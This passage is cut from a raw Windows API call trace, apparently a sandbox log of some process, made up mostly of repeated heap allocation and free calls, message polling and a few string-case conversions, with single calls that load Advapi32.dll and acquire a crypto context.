| out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.299] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.299] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.299] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0159.299] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.299] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.300] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.300] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.300] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0159.300] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.301] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.301] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.302] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.302] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.302] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.302] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0159.302] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.302] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.302] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0159.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.302] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.303] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0159.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0159.303] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.303] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.303] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0159.303] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.303] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0159.303] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0159.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0159.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0159.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0159.303] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0159.303] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0159.304] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0159.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0159.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0159.309] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0159.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0159.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0159.310] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0159.310] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0159.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0159.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0159.311] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | 